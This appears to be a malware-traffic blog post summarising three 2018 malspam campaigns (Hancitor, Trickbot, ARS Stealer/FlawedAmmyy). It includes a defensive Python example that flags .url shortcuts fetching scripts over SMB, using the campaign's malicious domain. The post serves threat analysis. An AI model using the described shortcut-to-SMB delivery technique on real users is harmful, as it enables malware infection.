2018-04-24 - INFECTION TRAFFIC, EMAIL EXAMPLES, AND MALWARE FROM 3 MALSPAM CAMPAIGNS

HANCITOR MALSPAM:
TRICKBOT MALSPAM:
POSSIBLE NECURS BOTNET MALSPAM PUSHING ARS STEALER/ASPC BOT & FLAWEDAMMYY:
NOTES AND IMAGES FOR POSSIBLE NECURS BOTNET WAVE:
Shown above:  .url file causing SMB traffic to blumblummpg.com to retrieve a .vbs file.
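The shortcut behaviour in the image above (a .url file whose target is a remote share, so opening it makes Windows fetch a script over SMB) can be checked for on the host side. The following is an added example, not code from the original post: it parses an [InternetShortcut] file and flags targets that resolve to a remote SMB host. The shortcut text is constructed; only the domain blumblummpg.com comes from the post.

```python
from urllib.parse import urlparse

# Constructed sample of an Internet Shortcut (.url) file. The host name is the
# one from the capture above; the share and file name are invented.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://blumblummpg.com/share/invoice.vbs
IconIndex=1
"""

# Script/executable extensions that should never be launched from a remote share.
SUSPICIOUS_EXTENSIONS = (".vbs", ".js", ".jse", ".wsf", ".hta", ".exe", ".scr")


def parse_internet_shortcut(text):
    """Return the URL= value from the [InternetShortcut] section, or None."""
    in_section = False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and line.lower().startswith("url="):
            return line[4:].strip()
    return None


def remote_smb_target(url):
    """Return (host, path) if the target is fetched over SMB, else None.

    Two forms trigger SMB: a UNC path (\\\\host\\share\\file) and a file:// URL
    with a non-empty host part. Plain http(s) URLs do not.
    """
    if not url:
        return None
    if url.startswith("\\\\"):
        parts = url.lstrip("\\").split("\\")
        return (parts[0], "\\".join(parts[1:])) if parts[0] else None
    parsed = urlparse(url)
    if parsed.scheme.lower() == "file" and parsed.netloc:
        return (parsed.netloc, parsed.path)
    return None


def assess_shortcut(text):
    """Summarise a .url file: target, remote SMB host (if any), and a verdict."""
    url = parse_internet_shortcut(text)
    target = remote_smb_target(url)
    host, path = target if target else (None, "")
    suspicious = host is not None and path.lower().endswith(SUSPICIOUS_EXTENSIONS)
    return {"url": url, "remote_host": host, "suspicious": suspicious}
```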
Shown above:  Port 80 HTTP POSTs are ARS Stealer/ASPC Bot traffic.  Port 443 traffic is FlawedAmmyy.
Shown above:  Some alerts on the traffic from Sguil in Security Onion using Suricata and the EmergingThreats Pro (ETPRO) ruleset.
FINAL NOTES

Zip archives are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.